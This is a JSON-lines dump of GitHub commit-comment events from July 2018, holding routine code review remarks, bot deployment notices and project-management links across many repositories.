{"id":"8012773482","type":"CommitCommentEvent","actor":{"login":"hackrush01"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29820072,"position":1,"line":1,"path":"lbrynet/daemon/auth/server.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-24T21:07:37Z","updated_at":"2018-07-24T21:07:37Z","author_association":"MEMBER","body":"I passes"}},"created_at":"2018-07-24T21:07:37Z"}
{"id":"8012777492","type":"CommitCommentEvent","actor":{"login":"himtrip99"},"repo":{"name":"himtrip99/Node"},"payload":{"comment":{"id":29820077,"position":null,"line":null,"path":null,"commit_id":"af284438a07e04c674bdfd7492119dc5f32a1bcd","created_at":"2018-07-24T21:08:27Z","updated_at":"2018-07-24T21:08:27Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-24T21:08:27Z"}
{"id":"8012778446","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820081,"position":8,"line":8,"path":"ideal-weight.rb","commit_id":"87b2dc91f9dad6b5f748995998fe18157501c19d","created_at":"2018-07-24T21:08:40Z","updated_at":"2018-07-24T21:08:40Z","author_association":"NONE","body":"в else не пишется условие. Условие пишется для if, и elsif. В еlse выполнение кода зайдет только в случае, если не зашло ни в одно из предыдущих ветвлений.\r\n```\r\nif условие\r\n  # выполнится код, если \"условие\" вернет правдивое значение\r\nelsif другое_условие\r\n  # выполнится код, если \"другое_условие\" вернет правдивое значение\r\nelse\r\n  # код который выполнится, если ни \"условие\" ни \"другое_условие\" не выполнились\r\nend\r\n```\r\nА правдивым значением в руби считается все кроме nil и  false"}},"created_at":"2018-07-24T21:08:40Z"}
{"id":"8012780805","type":"CommitCommentEvent","actor":{"login":"macolszewski"},"repo":{"name":"witkowski/javaszc4"},"payload":{"comment":{"id":29820087,"position":null,"line":null,"path":null,"commit_id":"acc1d476a6f56f2ca0aa3134b0c1d430c1be7c82","created_at":"2018-07-24T21:09:11Z","updated_at":"2018-07-24T21:09:11Z","author_association":"COLLABORATOR","body":"Oj tam spier..... od razu. :D"}},"created_at":"2018-07-24T21:09:11Z"}
{"id":"8012785860","type":"CommitCommentEvent","actor":{"login":"NebrasTaleb"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29820101,"position":24,"line":55,"path":"app/src/main/java/com/example/android/quakereport/SettingsActivity.java","commit_id":"05190298d7e6a7de21e3beb8f940e133fea67b4c","created_at":"2018-07-24T21:10:13Z","updated_at":"2018-07-24T21:10:13Z","author_association":"NONE","body":"Why do have to check if it is greater than or equal to zero ? in which situation the index is going to be less than zero ?!"}},"created_at":"2018-07-24T21:10:13Z"}
{"id":"8012786813","type":"CommitCommentEvent","actor":{"login":"hackrush01"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29820102,"position":5,"line":33,"path":"lbrynet/daemon/DaemonServer.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-24T21:10:24Z","updated_at":"2018-07-24T21:10:24Z","author_association":"MEMBER","body":"https://stackoverflow.com/a/47078367"}},"created_at":"2018-07-24T21:10:24Z"}
{"id":"8012790330","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820112,"position":7,"line":7,"path":"quadratic- equation.rb","commit_id":"201b1cae1e957b3e37dd654d8ced91aff9a5b341","created_at":"2018-07-24T21:11:07Z","updated_at":"2018-07-24T21:11:07Z","author_association":"NONE","body":"Все скобки тут избыточны. У оператора вычитания ниже приоритет, чем у оператора возведения в степень, или оператора умножения."}},"created_at":"2018-07-24T21:11:07Z"}
{"id":"8012791081","type":"CommitCommentEvent","actor":{"login":"hackrush01"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29820114,"position":5,"line":33,"path":"lbrynet/daemon/DaemonServer.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-24T21:11:16Z","updated_at":"2018-07-24T21:11:16Z","author_association":"MEMBER","body":"https://twistedmatrix.com/documents/16.3.1/api/twisted.web.resource.IResource.html#putChild"}},"created_at":"2018-07-24T21:11:16Z"}
{"id":"8012795360","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820128,"position":7,"line":7,"path":"quadratic- equation.rb","commit_id":"201b1cae1e957b3e37dd654d8ced91aff9a5b341","created_at":"2018-07-24T21:12:09Z","updated_at":"2018-07-24T21:12:09Z","author_association":"NONE","body":"С предыдущего код-ревью:\r\n\r\nVladFiliucov 6 days ago\r\nТут и в дальнейшем\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```\r\nпри этом оператор возведения в степень не рекомендуется выделять пробелами\r\n```\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-24T21:12:09Z"}
{"id":"8012795753","type":"CommitCommentEvent","actor":{"login":"mcallegari"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29820129,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-24T21:12:14Z","updated_at":"2018-07-24T21:12:14Z","author_association":"OWNER","body":"Manual actually says \"White\", not \"Open\". In fact there's also \"White + Red\", so it makes me think it's a real white filter.\r\nhttps://www.claypaky.it/media/documents/AlphaBeam300_Manual_Rev.4_(03.10).pdf\r\n\r\nI'm confused."}},"created_at":"2018-07-24T21:12:14Z"}
{"id":"8012797825","type":"CommitCommentEvent","actor":{"login":"sjarvie"},"repo":{"name":"uber/doubles"},"payload":{"comment":{"id":29820131,"position":null,"line":null,"path":null,"commit_id":"f9d11f6e676f496f59be6841f2f577137eba7f5b","created_at":"2018-07-24T21:12:38Z","updated_at":"2018-07-24T21:12:38Z","author_association":"NONE","body":"Are you going to deploy this soon?"}},"created_at":"2018-07-24T21:12:38Z"}
{"id":"8012800216","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820141,"position":14,"line":14,"path":"quadratic- equation.rb","commit_id":"201b1cae1e957b3e37dd654d8ced91aff9a5b341","created_at":"2018-07-24T21:13:09Z","updated_at":"2018-07-24T21:13:09Z","author_association":"NONE","body":"строки с 9 по 14 должны быть проиндентированны в 2 пробела от начала строки"}},"created_at":"2018-07-24T21:13:09Z"}
{"id":"8012800883","type":"CommitCommentEvent","actor":{"login":"Rotsor"},"repo":{"name":"edolstra/nix"},"payload":{"comment":{"id":29820143,"position":59,"line":177,"path":"src/libstore/references.cc","commit_id":"236e87c687065c2aa935542533b1a65282a73347","created_at":"2018-07-24T21:13:17Z","updated_at":"2018-07-24T21:13:17Z","author_association":"NONE","body":"Maybe you can create collisions by adding what looks like a position to the end of the input? E.g. take an existing blob with no self-references, find a position where it has enough zeroes (say 200) and append \"|200\"."}},"created_at":"2018-07-24T21:13:17Z"}
{"id":"8012802313","type":"CommitCommentEvent","actor":{"login":"xylo"},"repo":{"name":"xylo/intellij-postfix-templates"},"payload":{"comment":{"id":29820148,"position":null,"line":null,"path":null,"commit_id":"ed3bb04a266bfdf90a6c449a1dbbdba501b3211f","created_at":"2018-07-24T21:13:35Z","updated_at":"2018-07-24T21:13:35Z","author_association":"OWNER","body":"Thanks for your contribution, Maksim!\r\n\r\nI would like to mention you in the changelog if that's OK for you?"}},"created_at":"2018-07-24T21:13:35Z"}
{"id":"8012805999","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820154,"position":17,"line":17,"path":"quadratic- equation.rb","commit_id":"201b1cae1e957b3e37dd654d8ced91aff9a5b341","created_at":"2018-07-24T21:14:23Z","updated_at":"2018-07-24T21:14:23Z","author_association":"NONE","body":"В этом блоке можно не считать корень, потому-что корень из 0 - всегда будет 0. И нет смысла прибавлять 0"}},"created_at":"2018-07-24T21:14:23Z"}
{"id":"8012808126","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29820157,"position":null,"line":null,"path":null,"commit_id":"5db5f66e978b4b66b45b888188579e4bae204979","created_at":"2018-07-24T21:14:49Z","updated_at":"2018-07-24T21:14:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-152](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-152).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-152-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T21:14:49Z"}
{"id":"8012808546","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820160,"position":19,"line":19,"path":"quadratic- equation.rb","commit_id":"201b1cae1e957b3e37dd654d8ced91aff9a5b341","created_at":"2018-07-24T21:14:55Z","updated_at":"2018-07-24T21:14:55Z","author_association":"NONE","body":"строки с 16 по 19 должны быть проиндентированны в 2 пробела"}},"created_at":"2018-07-24T21:14:55Z"}
{"id":"8012810778","type":"CommitCommentEvent","actor":{"login":"bbferka"},"repo":{"name":"RoboSherlock/uimacpp_ros"},"payload":{"comment":{"id":29820170,"position":null,"line":null,"path":null,"commit_id":"81808084eb45e65f2cf7b559b79b7b1953c10c6d","created_at":"2018-07-24T21:15:23Z","updated_at":"2018-07-24T21:15:23Z","author_association":"NONE","body":"@MaidouPP what are the binary files?\r\n"}},"created_at":"2018-07-24T21:15:23Z"}
{"id":"8012810902","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820171,"position":20,"line":20,"path":"quadratic- equation.rb","commit_id":"201b1cae1e957b3e37dd654d8ced91aff9a5b341","created_at":"2018-07-24T21:15:25Z","updated_at":"2018-07-24T21:15:25Z","author_association":"NONE","body":"Уже писал, про то, что else не принимает условий"}},"created_at":"2018-07-24T21:15:25Z"}
{"id":"8012811047","type":"CommitCommentEvent","actor":{"login":"crashe24"},"repo":{"name":"crashe24/avengers"},"payload":{"comment":{"id":29820172,"position":null,"line":null,"path":null,"commit_id":"302c5c0b157b3f7375527342835a66bba80ee954","created_at":"2018-07-24T21:15:27Z","updated_at":"2018-07-24T21:15:27Z","author_association":"OWNER","body":"Aqui creamos la misio de redskull  #9 \r\n\r\nOtras cossas\r\n"}},"created_at":"2018-07-24T21:15:27Z"}
{"id":"8012812313","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820174,"position":22,"line":22,"path":"quadratic- equation.rb","commit_id":"201b1cae1e957b3e37dd654d8ced91aff9a5b341","created_at":"2018-07-24T21:15:42Z","updated_at":"2018-07-24T21:15:42Z","author_association":"NONE","body":"21 и 22 строки нужно проиндентировать"}},"created_at":"2018-07-24T21:15:42Z"}
{"id":"8012818756","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29820182,"position":null,"line":null,"path":null,"commit_id":"b4f83e144635f225094e52ef4e5d757a3321e4c2","created_at":"2018-07-24T21:17:03Z","updated_at":"2018-07-24T21:17:03Z","author_association":"COLLABORATOR","body":"<h3>Remove unused Switch variables</h3>\n\nPreview: <strong><a href='https://19068-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19068-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19068-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-24T21:17:03Z"}
{"id":"8012824166","type":"CommitCommentEvent","actor":{"login":"MaidouPP"},"repo":{"name":"RoboSherlock/uimacpp_ros"},"payload":{"comment":{"id":29820194,"position":null,"line":null,"path":null,"commit_id":"81808084eb45e65f2cf7b559b79b7b1953c10c6d","created_at":"2018-07-24T21:18:13Z","updated_at":"2018-07-24T21:18:13Z","author_association":"COLLABORATOR","body":"I accidentally added those tag files, which is for my editor. Already deleted in the following commit."}},"created_at":"2018-07-24T21:18:13Z"}
{"id":"8012826655","type":"CommitCommentEvent","actor":{"login":"maksimr"},"repo":{"name":"xylo/intellij-postfix-templates"},"payload":{"comment":{"id":29820198,"position":null,"line":null,"path":null,"commit_id":"ed3bb04a266bfdf90a6c449a1dbbdba501b3211f","created_at":"2018-07-24T21:18:47Z","updated_at":"2018-07-24T21:18:47Z","author_association":"CONTRIBUTOR","body":"No problem!\r\n\r\n> I would like to mention you in the changelog if that's OK for you?\r\n\r\nSure"}},"created_at":"2018-07-24T21:18:47Z"}
{"id":"8012826966","type":"CommitCommentEvent","actor":{"login":"Aotner"},"repo":{"name":"Aotner/Nocturnal-Engine"},"payload":{"comment":{"id":29820199,"position":36,"line":36,"path":"NocturnalEngine/Source/Foundation/Window/Public/Window.h","commit_id":"ca699f597676c55d19712c525c3eab8cfe7eb46b","created_at":"2018-07-24T21:18:51Z","updated_at":"2018-07-24T21:18:51Z","author_association":"OWNER","body":"public methods on top, private details under."}},"created_at":"2018-07-24T21:18:51Z"}
{"id":"8012828423","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29820203,"position":null,"line":null,"path":null,"commit_id":"ba3ac20c01cf6791ecfc5480293ef4f2d75aec2a","created_at":"2018-07-24T21:19:11Z","updated_at":"2018-07-24T21:19:11Z","author_association":"NONE","body":"You should stop this. Tuning is not moving at all.\r\n\r\n\r\nYour (default) SPSA settings were\r\nmOverload,13,0,26,1.3,0.0020\r\neOverload,6,0,12,0.6,0.0020\r\n\r\nThose ck's are much too smal\r\n1.3 and 0.6\r\n\r\nI suggest to try\r\nTUNE(SetRange(-50, 50), Overload);\r\n\r\nand use the (non default)\r\nmOverload,13,-50,50,5,0.0020\r\neOverload,6,-50,50,4,0.0020\r\n\r\nThis means that the last games will be played will be 13+-5 against 13 -+5 and 6+-4 and 6-+4\r\n"}},"created_at":"2018-07-24T21:19:11Z"}
{"id":"8012829789","type":"CommitCommentEvent","actor":{"login":"desenvolvedorIcotrade"},"repo":{"name":"desenvolvedorIcotrade/WebServices"},"payload":{"comment":{"id":29820204,"position":1,"line":1,"path":".circleci","commit_id":"af2197c8e5531adc7ac02a9749ba12d26df90b6d","created_at":"2018-07-24T21:19:29Z","updated_at":"2018-07-24T21:19:29Z","author_association":"OWNER","body":"![1521729457 5](https://user-images.githubusercontent.com/35335846/43166830-12e876d8-8f6e-11e8-8b2a-3de497990b50.gif)\r\n"}},"created_at":"2018-07-24T21:19:29Z"}
{"id":"8012830816","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29820205,"position":null,"line":null,"path":null,"commit_id":"1275d7fed82ed5dd2fcfc17bba26325beae1ce43","created_at":"2018-07-24T21:19:43Z","updated_at":"2018-07-24T21:19:43Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-24T21:19:43Z"}
{"id":"8012831634","type":"CommitCommentEvent","actor":{"login":"msmalik681"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29820207,"position":null,"line":null,"path":null,"commit_id":"d5e140bb520abcf8c55fed43c53ab8a555dcdb41","created_at":"2018-07-24T21:19:53Z","updated_at":"2018-07-24T21:19:53Z","author_association":"COLLABORATOR","body":"Where should the constants go ? "}},"created_at":"2018-07-24T21:19:53Z"}
{"id":"8012832773","type":"CommitCommentEvent","actor":{"login":"Aotner"},"repo":{"name":"Aotner/Nocturnal-Engine"},"payload":{"comment":{"id":29820209,"position":18,"line":18,"path":"NocturnalEngine/Source/Foundation/Window/Public/Window.h","commit_id":"ca699f597676c55d19712c525c3eab8cfe7eb46b","created_at":"2018-07-24T21:20:09Z","updated_at":"2018-07-24T21:20:09Z","author_association":"OWNER","body":"use engine defined types, int32, int64, uint32 and so on"}},"created_at":"2018-07-24T21:20:09Z"}
{"id":"8012836298","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29820216,"position":null,"line":null,"path":null,"commit_id":"d43853e6d40f640277ddfeb5c61f7138adcf14b0","created_at":"2018-07-24T21:20:54Z","updated_at":"2018-07-24T21:20:54Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Gromov-Weierstrass for distance geometry mode regularization](https://trello.com/c/KfAROOQK/77-implement-gromov-weierstrass-for-distance-geometry-mode-regularization)"}},"created_at":"2018-07-24T21:20:54Z"}
{"id":"8012836804","type":"CommitCommentEvent","actor":{"login":"adrianbg"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29820218,"position":52,"line":64,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T21:21:02Z","updated_at":"2018-07-24T21:21:02Z","author_association":"CONTRIBUTOR","body":"Might be good to be consistent with how wandb_torch does this:\r\n\r\n```python\r\n        # kthvalue uses 1-based indexing for some reason\r\n        i0_05 = max(1, min(int(round(0.05 * l)), l))\r\n        i0_95 = max(1, min(int(round(0.95 * l)), l))\r\n        history.row.update({\r\n            name + '-0.00': tensor.min(),\r\n            name + '-0.05': flat.kthvalue(i0_05)[0][0],\r\n            name + '-0.50': tensor.median(),\r\n            name + '-0.95': flat.kthvalue(i0_95)[0][0],\r\n            name + '-1.00': tensor.max(),\r\n            name + '-mean': tensor.mean(),\r\n            name + '-stddev': tensor.std()\r\n        })\r\n```"}},"created_at":"2018-07-24T21:21:02Z"}
{"id":"8012836986","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Node-Express-Lab"},"payload":{"comment":{"id":29820220,"position":null,"line":null,"path":null,"commit_id":"4ccb637549447d7677a922dcd0d21fe93be688ec","created_at":"2018-07-24T21:21:05Z","updated_at":"2018-07-24T21:21:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Endpoints](https://trello.com/c/eJLEa6bS/1-create-endpoints)"}},"created_at":"2018-07-24T21:21:05Z"}
{"id":"8012837439","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-api"},"payload":{"comment":{"id":29820225,"position":21,"line":102,"path":"authentication/authentication.py","commit_id":"e3df2477fd4f5f11b1f67df45273548678d2e280","created_at":"2018-07-24T21:21:11Z","updated_at":"2018-07-24T21:21:11Z","author_association":"CONTRIBUTOR","body":"This logic is still weird.  Why are you updating it to a new email and then immediately err-ing out when it sees a user with that new email?  It is always going to fail isn't it?  @tlj4k8 @EricMason24 "}},"created_at":"2018-07-24T21:21:11Z"}
{"id":"8012839487","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-api"},"payload":{"comment":{"id":29820231,"position":21,"line":102,"path":"authentication/authentication.py","commit_id":"e3df2477fd4f5f11b1f67df45273548678d2e280","created_at":"2018-07-24T21:21:38Z","updated_at":"2018-07-24T21:21:38Z","author_association":"CONTRIBUTOR","body":"Does update_attendee not actually save the object?"}},"created_at":"2018-07-24T21:21:38Z"}
{"id":"8012839544","type":"CommitCommentEvent","actor":{"login":"jaapaurelio"},"repo":{"name":"2HitAdam/laradock"},"payload":{"comment":{"id":29820232,"position":20,"line":154,"path":"php-fpm/Dockerfile","commit_id":"c272f4ca1e22521236a6e78ce3939309f053220b","created_at":"2018-07-24T21:21:39Z","updated_at":"2018-07-24T21:21:39Z","author_association":"NONE","body":"For me, git it's not available at this point."}},"created_at":"2018-07-24T21:21:39Z"}
{"id":"8012840553","type":"CommitCommentEvent","actor":{"login":"Aotner"},"repo":{"name":"Aotner/Nocturnal-Engine"},"payload":{"comment":{"id":29820236,"position":7,"line":7,"path":"NocturnalEngine/Source/Foundation/Window/Private/WindowWin32.cpp","commit_id":"ca699f597676c55d19712c525c3eab8cfe7eb46b","created_at":"2018-07-24T21:21:52Z","updated_at":"2018-07-24T21:21:52Z","author_association":"OWNER","body":"use inline constructor here"}},"created_at":"2018-07-24T21:21:52Z"}
{"id":"8012841844","type":"CommitCommentEvent","actor":{"login":"Aotner"},"repo":{"name":"Aotner/Nocturnal-Engine"},"payload":{"comment":{"id":29820241,"position":14,"line":14,"path":"NocturnalEngine/Source/Foundation/Window/Private/WindowWin32.cpp","commit_id":"ca699f597676c55d19712c525c3eab8cfe7eb46b","created_at":"2018-07-24T21:22:11Z","updated_at":"2018-07-24T21:22:11Z","author_association":"OWNER","body":"use inline constructor here "}},"created_at":"2018-07-24T21:22:11Z"}
{"id":"8012842769","type":"CommitCommentEvent","actor":{"login":"DCurrent"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29820244,"position":null,"line":null,"path":null,"commit_id":"d5e140bb520abcf8c55fed43c53ab8a555dcdb41","created_at":"2018-07-24T21:22:23Z","updated_at":"2018-07-24T21:22:23Z","author_association":"OWNER","body":"General constants still go into openbor.h, but that's not what these are. I explained it in my post, and pointed to an example of how it should work."}},"created_at":"2018-07-24T21:22:23Z"}
{"id":"8012876286","type":"CommitCommentEvent","actor":{"login":"drochgenius"},"repo":{"name":"drochgenius/learning-spine-browser"},"payload":{"comment":{"id":29820308,"position":5,"line":99,"path":"src/components/learning-spine-browser.ts","commit_id":"9d16d99c02fe807106c6d0abb3685323f280ea3e","created_at":"2018-07-24T21:29:46Z","updated_at":"2018-07-24T21:29:46Z","author_association":"OWNER","body":"!"}},"created_at":"2018-07-24T21:29:46Z"}
{"id":"8012877873","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29820311,"position":null,"line":null,"path":null,"commit_id":"683605bafb2bd7301989a58cd945ddebfbfe603c","created_at":"2018-07-24T21:30:09Z","updated_at":"2018-07-24T21:30:09Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-152](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-152).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-152-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T21:30:09Z"}
{"id":"8012880924","type":"CommitCommentEvent","actor":{"login":"pc01pc013"},"repo":{"name":"unlightvbe/unlightvbe_qs"},"payload":{"comment":{"id":29820317,"position":null,"line":null,"path":null,"commit_id":"21f242dee180d3fb758bf213a410aec6c57eadc0","created_at":"2018-07-24T21:30:49Z","updated_at":"2018-07-24T21:30:49Z","author_association":"MEMBER","body":"紀念個\r\n![WineCanRun](https://i.imgur.com/3inbwVg.png \"WineCanRun\")"}},"created_at":"2018-07-24T21:30:49Z"}
{"id":"8012881062","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29820322,"position":null,"line":null,"path":null,"commit_id":"b6e6f84c128c0112e58acdf1e59f2cc9756f5de4","created_at":"2018-07-24T21:30:51Z","updated_at":"2018-07-24T21:30:51Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1016](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1016).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1016-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T21:30:51Z"}
{"id":"8012881265","type":"CommitCommentEvent","actor":{"login":"mrstegeman"},"repo":{"name":"mozilla-iot/addon-list"},"payload":{"comment":{"id":29820325,"position":4,"line":26,"path":"list.json","commit_id":"b59baaa5a2eeb65d96795d5df6a277ad5af74295","created_at":"2018-07-24T21:30:53Z","updated_at":"2018-07-24T21:30:53Z","author_association":"CONTRIBUTOR","body":"Yes, just something I noticed while reviewing."}},"created_at":"2018-07-24T21:30:53Z"}
{"id":"8012881760","type":"CommitCommentEvent","actor":{"login":"rjhintz"},"repo":{"name":"salexpdx/og-aws"},"payload":{"comment":{"id":29820330,"position":null,"line":null,"path":null,"commit_id":"5d65fa431ac56a301db26a955a1cc78b077d6507","created_at":"2018-07-24T21:31:01Z","updated_at":"2018-07-24T21:31:01Z","author_association":"NONE","body":"Agree that historical context is relevant, especially in combating FUD on this and understanding how, potentially anyway, noisy neighbor could be identified, at least in the past.\r\n\r\nGood comment on running out of CPU credits.\r\n\r\nTwo cases on the physical issue come to mind:\r\n- scheduled, for upgrading/patching by AWS or the user: you typically get notice and port the workloads to another machine\r\n- unscheduled: if you're monitoring health and the box goes into distress, you could port assuming you have enough notice. If not using best practice, you're dead.\r\n\r\nThe physical server issue is interesting. I don't have any good proposed language that's not book length. ;)"}},"created_at":"2018-07-24T21:31:01Z"}
{"id":"8012881777","type":"CommitCommentEvent","actor":{"login":"getinthedamnbox"},"repo":{"name":"longvuwpi/RhythmMechanic"},"payload":{"comment":{"id":29820331,"position":null,"line":null,"path":null,"commit_id":"21a98e8c1f70a13010bc4a762aad951350c45386","created_at":"2018-07-24T21:31:01Z","updated_at":"2018-07-24T21:31:01Z","author_association":"COLLABORATOR","body":"I made the following changes:\r\n\r\n1. Made variable and method names adhere to the style guide\r\n2. Autoformatted spacing and indentation\r\n3. Made public variables private wherever possible\r\n4. Hid some public variables in the Inspector (as requested by a comment at the top of a class)\r\n\r\nCleaning this up fully would require a lot more work. I understand that this is whitebox code, though, so it's probably not worth it!"}},"created_at":"2018-07-24T21:31:01Z"}
{"id":"8012884235","type":"CommitCommentEvent","actor":{"login":"janosvitok"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29820335,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-24T21:31:35Z","updated_at":"2018-07-24T21:31:35Z","author_association":"CONTRIBUTOR","body":"https://www.claypaky.it/media/documents/Alpha300_Brochure_EN.pdf\r\nYou can see the color wheel on page 5, and color diagram on page 6. Since it's white light source, white filter does not make sense. Actually, in the color wheel description you can see 8+1, usually meaning 8 colors + 1 open position.\r\n\r\nAvolite d4 personality has \"Open\" there: http://personalities.avolites.com/?mainPage=ViewPersonality.aspx&FileID=7591&source=true"}},"created_at":"2018-07-24T21:31:35Z"}
{"id":"8012885097","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29820337,"position":null,"line":null,"path":null,"commit_id":"3eb0e0cee2e9646faf51caa9a2373e771f36e767","created_at":"2018-07-24T21:31:46Z","updated_at":"2018-07-24T21:31:46Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-152](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-152).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-152-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T21:31:46Z"}
{"id":"8012886287","type":"CommitCommentEvent","actor":{"login":"EricMason24"},"repo":{"name":"SlalomSTLHealthcare/healthcare-api"},"payload":{"comment":{"id":29820339,"position":21,"line":102,"path":"authentication/authentication.py","commit_id":"e3df2477fd4f5f11b1f67df45273548678d2e280","created_at":"2018-07-24T21:32:03Z","updated_at":"2018-07-24T21:32:03Z","author_association":"COLLABORATOR","body":"oh wait, i thought we changed that so that the update_attendee was in the else, because yeah it does, so it should err out the whole thing or nothing"}},"created_at":"2018-07-24T21:32:03Z"}
{"id":"8012887379","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Node-Express-Lab"},"payload":{"comment":{"id":29820342,"position":null,"line":null,"path":null,"commit_id":"b92ba1e5be31aeb05852ec1d4958327174073bb5","created_at":"2018-07-24T21:32:18Z","updated_at":"2018-07-24T21:32:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Use create-react-app to create an application inside the root folder, name it client.](https://trello.com/c/OKHOCFR2/2-use-create-react-app-to-create-an-application-inside-the-root-folder-name-it-client)"}},"created_at":"2018-07-24T21:32:18Z"}
{"id":"8012894644","type":"CommitCommentEvent","actor":{"login":"Aotner"},"repo":{"name":"Aotner/Nocturnal-Engine"},"payload":{"comment":{"id":29820359,"position":12,"line":12,"path":"NocturnalEngine/Source/Foundation/Window/Private/WindowWin32.cpp","commit_id":"ca699f597676c55d19712c525c3eab8cfe7eb46b","created_at":"2018-07-24T21:34:00Z","updated_at":"2018-07-24T21:34:00Z","author_association":"OWNER","body":"why you aren't using windowSetting also inside the Window, since it is platform agnostic?"}},"created_at":"2018-07-24T21:34:00Z"}
